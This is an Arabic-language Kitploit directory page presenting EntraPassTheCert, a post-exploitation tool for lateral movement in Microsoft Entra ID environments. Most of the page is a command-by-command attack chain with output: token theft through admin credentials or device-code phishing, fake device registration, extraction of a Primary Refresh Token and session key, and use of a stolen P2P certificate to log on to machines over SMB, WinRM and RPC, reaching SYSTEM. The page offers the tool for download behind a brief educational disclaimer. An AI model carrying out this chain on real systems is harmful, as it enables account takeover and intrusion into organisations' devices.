Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EntraPassTheCert — أداة لطلب شهادة P2P الخاصة بـ Entra ID واستخدامها للمصادقة على أجهزة Entra المنضمة عن بُعد. | Kitploit
أدوات/GitHubGitHub/temp43487580/entrapassthecert
الحركة الجانبيةما بعد الاستغلالاختبار الاختراقأمن السحابةإدارة الهوية والوصول (IAM)المصادقةالفريق الأحمر
GitHubtemp43487580/entrapassthecert

EntraPassTheCert

أداة لطلب شهادة P2P الخاصة بـ Entra ID واستخدامها للمصادقة على أجهزة Entra المنضمة عن بُعد.

عرض المستودع
135168منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EntraPassTheCert

EntraPassTheCert هي أداة استغلال لاحق تتيح للمهاجمين طلب شهادة P2P الخاصة بمستخدم Entra ID والمصادقة بها على جهاز بعيد منضم إلى Entra (Entra joinned).

root@kitploit:~
$ python3 entraptc.py -h

usage: entraptc.py [-h] [--debug] {request_p2pcert,smb,rdp,winrm,rpc} ...

post-exploitation tool for requesting p2p cert and authenticate with it

positional arguments:
  {request_p2pcert,smb,rdp,winrm,rpc}
                        Available commands
    request_p2pcert     request P2P cert with PRT and SessionKey
    smb                 SMB to Entra joinned machine with P2P cert
    rdp                 RDP to Entra joinned machine with P2P cert
    winrm               WinRM to Entra joinned machine with P2P cert
    rpc                 RPC to Entra joinned machine with P2P cert

options:
  -h, --help            show this help message and exit
  --debug               debug option

بُني الكود استنادًا إلى الأدوات الرائعة الموجودة.

  • impacket
  • ROADTools
  • AADInternals
  • pywinrm
  • aardwolf

تم تقديم هذه الأداة في Troopers 2025:

القفز عبر الأجهزة: توسيع نطاق الحركة الجانبية من خلال هجوم Pass-the-Certificate

الاستخدام

طلب شهادة P2P

أولاً، احصل على رموز Microsoft Entra المطلوبة باستخدام بيانات اعتماد أي حساب لديه صلاحية مسؤول محلي على الجهاز المستهدف.

root@kitploit:~
$ roadtx gettokens -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e -u globaladmin@***.onmicrosoft.com -p $PASSWORD
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
Tokens were written to .roadtools_auth

إذا لم تتوفر لديك بيانات الاعتماد، يمكنك أيضًا تنفيذ هجوم تصيد عبر رمز الجهاز (device-code phishing) للحصول على الرموز.

root@kitploit:~
$ roadtx gettokens --device-code -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code HGCUCJ6CS to authenticate.
Tokens were written to .roadtools_auth

بعد ذلك، سجّل جهازًا وهميًا في Entra ID.

root@kitploit:~
$ roadtx device -a join -n fake_device
Saving private key to fake_device.key
Registering device
Device ID: 0d9d2d66-7343-4bf2-a3dd-377c9e1e6244
Saved device certificate to fake_device.pem

ثم، باستخدام الجهاز المسجل، اطلب PRT ومفتاح الجلسة.

root@kitploit:~
$ REFRESHTOKEN=(`cat .roadtools_auth | jq -r .refreshToken`) 

$ roadtx prt -c fake_device.pem -k fake_device.key -r $REFRESHTOKEN
Obtained PRT: 1.AT0A7mRQZ....
Obtained session key: fabd04bf017c526fd...
Saved PRT to roadtx.prt

بمجرد حصولك على PRT ومفتاح الجلسة، يمكنك طلب شهادة P2P الخاصة بالمستخدم.

root@kitploit:~
$ PRT=(`cat roadtx.prt | jq -r .refresh_token`)

$ SESSIONKEY=(`cat roadtx.prt | jq -r .session_key`)

$ python3 entraptc.py request_p2pcert --prt $PRT --sessionkey $SESSIONKEY
[*] requesting P2P cert...
[+] successfully acquired P2P cert!
[*] here is your p2p cert pfx : p2pcert.pfx (pw: password)

تمرير شهادة P2P

يمكنك المصادقة على جهاز منضم إلى Entra باستخدام شهادة P2P كما يلي.

  • SMB
root@kitploit:~
$ python3 entraptc.py smb --target 192.168.153.133 --pfx p2pcert.pfx      
[*] connecting to 192.168.153.133 via SMB...
[+] sucessfully logged-on to the system!
Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw-          0  Fri May 30 15:52:50 2025 $Recycle.Bin
drw-rw-rw-          0  Sat Apr 19 01:54:46 2025 Documents and Settings
-rw-rw-rw-      12288  Sun Jun 15 10:45:59 2025 DumpStack.log.tmp
drw-rw-rw-          0  Fri May 30 09:06:09 2025 inetpub
-rw-rw-rw-  738197504  Sun Jun 15 10:45:58 2025 pagefile.sys
drw-rw-rw-          0  Sat Apr 19 02:49:28 2025 PerfLogs
drw-rw-rw-          0  Tue Jun 10 14:58:44 2025 Program Files
drw-rw-rw-          0  Tue May 27 15:59:56 2025 Program Files (x86)
drw-rw-rw-          0  Tue Jun 10 14:54:46 2025 ProgramData
drw-rw-rw-          0  Sat Apr 19 01:53:41 2025 Recovery
-rw-rw-rw-   16777216  Sun Jun 15 10:45:59 2025 swapfile.sys
drw-rw-rw-          0  Fri May 30 09:39:44 2025 System Volume Information
drw-rw-rw-          0  Fri May 30 15:52:23 2025 Users
drw-rw-rw-          0  Wed Jun 11 09:30:27 2025 Windows
  • WinRM
root@kitploit:~
$ python3 entraptc.py winrm --target 192.168.153.133 --pfx p2pcert.pfx
[*] connecting to 192.168.153.133 via WinRM...
[+] sucessfully logged-on to the system!

C:\Users\admin> whoami
azuread\admin
  • RPC
root@kitploit:~
$ python3 entraptc.py rpc --target 192.168.153.133 --pfx p2pcert.pfx                                                                   

[*] connecting to 192.168.153.133 via RPC...
[+] sucessfully logged-on to the system!

C:\Windows\System32>whoami
nt authority\system
  • RDP
    • تحتاج إلى تحديد بيانات اعتماد الحساب
root@kitploit:~
$ python3 entraptc.py rdp --username globaladmin@***.onmicrosoft.com --password $PASSWORD --target 192.168.153.133 --pfx p2pcert.pfx

ملاحظات

  • يجب أن يكون الجهاز المستهدف جهازًا منضمًا إلى Entra، وليس منضمًا إلى Hybrid Entra أو مسجلاً في Entra.
  • تم الاختبار على أجهزة Windows 11/10 وليس على Windows Server.

إخلاء مسؤولية

هذا المشروع مُقدَّم لأغراض تعليمية وبحثية فقط.
يهدف إلى مساعدة المتخصصين في الأمن، والباحثين، والطلاب على فهم نواقل الهجوم المحتملة وتحسين الإجراءات الدفاعية.

مرجع

https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597

تنزيل الأداة